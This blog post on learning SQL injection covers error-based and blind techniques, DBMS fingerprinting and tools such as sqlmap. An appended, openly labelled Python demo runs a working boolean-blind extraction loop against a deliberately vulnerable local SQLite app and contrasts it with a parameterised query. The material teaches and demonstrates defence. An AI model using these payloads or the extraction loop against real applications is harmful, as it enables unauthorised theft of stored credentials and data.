Thursday, May 17, 2012

Always Learning SQL injection

IT security and penetration testing is a challenging discipline and I learn every day. Some days it does not dawn on me, or register in my brain, that I have learned something. Today was different. I have been somewhat discouraged about my prowess at performing a good SQL injection. Today that was made a little clearer by reviewing my EC-Council CEH course material and my eLearnSecurity course material on error-based and blind SQL injection.

MS SQL Server is the textbook target for error-based SQL injection, and it is the easiest case: its error messages are verbose and, when the application passes them back to the browser, they tell the ethical hacker (or anyone else) a great deal about the database. A type-conversion error in MS SQL even carries data out with it, for example "Conversion failed when converting the nvarchar value 'alice' to data type int." What actually matters, though, is not the vendor but whether the application echoes database errors to the user: MySQL ("You have an error in your SQL syntax ..."), PostgreSQL and Oracle also leak through their error text when an application displays it, each with its own error-based tricks; what changes between them is the payload syntax, not whether the technique exists. The error text is also the quickest way to fingerprint the back end, which is the first step regardless, because every later payload (comment style, string concatenation, version functions) is DBMS-specific. If the application shows no database errors at all, fall back to blind injection (boolean-based or time-based), which infers data one true/false answer at a time.

Error-based injection against MS SQL is fairly easy to do manually. Blind injection is extremely time consuming to do by hand, close to impossible for anything beyond a few bytes, and that is where tools earn their keep. My favourites are sqlmap, Pangolin and Havij; there are others. The trick with all of them is that you first have to find an injectable parameter, that is, a value the application takes from the user and pastes into a query, whether it arrives from a form field or from the URL. The URL might look something like http://vulnerablesite/index.php?products/id=3; here the user-controlled input is the product id, 3.

That URL probably talks to a back-end "products" table with an integer id column, a description column, likely a UPC code and whatever other product identifiers the site keeps. The whole URL goes into sqlmap, Havij or Pangolin as the target (sqlmap: -u 'http://vulnerablesite/index.php?products/id=3') and the injectable parameter is the id value. The tools accept whatever you already know about the target as hints, above all the DBMS type (sqlmap's --dbms option), but will fingerprint it themselves if you leave that out. You can inject through a GET or a POST request (sqlmap takes POST bodies with --data), choose error-based, boolean-blind or time-based techniques, and let the tool do the repetitive work of dumping the database columns.
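To make the blind case concrete, here is an added example of my own, not code from the original post, from any course material, or from the tools named above. It builds a constructed SQLite in-memory "products" database standing in for the back end behind the URL above, a deliberately vulnerable lookup that pastes the id value straight into the query, and a boolean-blind extraction loop that recovers a string from a second table using nothing but the "product found / not found" answer, one bit per request, which is exactly the loop sqlmap and friends automate. The schema, the credentials row, and the payload functions (SQLite's substr/unicode) are assumptions for the demo; a real target needs the equivalent functions of its own DBMS, which is why fingerprinting comes first. A parameterised version of the same lookup is included to show the probe failing against it.

```python
import sqlite3

# Constructed demo database standing in for the back end behind
# http://vulnerablesite/index.php?products/id=3 (schema and data are assumptions).
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, description TEXT, upc TEXT);
INSERT INTO products VALUES (1, 'Widget', '012345678905'),
                            (2, 'Gadget', '036000291452'),
                            (3, 'Gizmo',  '614141007349');
CREATE TABLE credentials (id INTEGER PRIMARY KEY, first_name TEXT, password TEXT);
INSERT INTO credentials VALUES (1, 'alice', 's3cret!');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


class VulnerableApp:
    """Simulates the page: the user-controlled id is pasted straight into the SQL."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0  # number of HTTP requests the attacker would have sent

    def product_exists(self, product_id: str) -> bool:
        self.requests += 1
        sql = "SELECT description FROM products WHERE id=" + product_id  # injection point
        return self.conn.execute(sql).fetchone() is not None


class SafeApp(VulnerableApp):
    """Same lookup with a bound parameter: the value can never become SQL."""

    def product_exists(self, product_id: str) -> bool:
        self.requests += 1
        row = self.conn.execute(
            "SELECT description FROM products WHERE id=?", (product_id,)
        ).fetchone()
        return row is not None


def oracle(app, condition: str) -> bool:
    """Boolean-blind oracle: 'id=3 AND (cond)' shows product 3 iff cond is true."""
    return app.product_exists(f"3 AND ({condition})")


def extract_string(app, subquery: str, max_len: int = 64) -> str:
    """Recover the result of `subquery` one character at a time via the oracle.

    Each character is found by binary search over code points 0..127 (ASCII
    assumed), so it costs seven requests.  The loop stops when substr() runs
    past the end: unicode('') is NULL in SQLite, every comparison is then
    false, and the search bottoms out at 0.
    """
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(app, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


def demo():
    conn = make_db()
    vuln = VulnerableApp(conn)
    # Classic true/false probe: a visible difference here is what the tools look for.
    probe = (vuln.product_exists("3 AND (1=1)"), vuln.product_exists("3 AND (1=2)"))
    secret = extract_string(vuln, "SELECT password FROM credentials WHERE first_name='alice'")
    safe = SafeApp(conn)
    safe_probe = (safe.product_exists("3"), safe.product_exists("3 AND (1=1)"))
    return probe, secret, vuln.requests, safe_probe


if __name__ == "__main__":
    probe, secret, n, safe_probe = demo()
    print("vulnerable app: id=3 AND 1=1 ->", probe[0], "| id=3 AND 1=2 ->", probe[1])
    print(f"blind-extracted password: {secret!r} in {n} requests")
    print("parameterised app: id=3 ->", safe_probe[0], "| id='3 AND (1=1)' ->", safe_probe[1])
```

Seven characters cost 58 requests here (two probes, seven per character, and seven more to detect the end of the string); a password hash or a whole column is hundreds to thousands of requests, which is why nobody does boolean-blind by hand and why the tools need a reliable true/false signal before they can dump anything. Against the parameterised lookup the same payload is just a string that matches no id.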
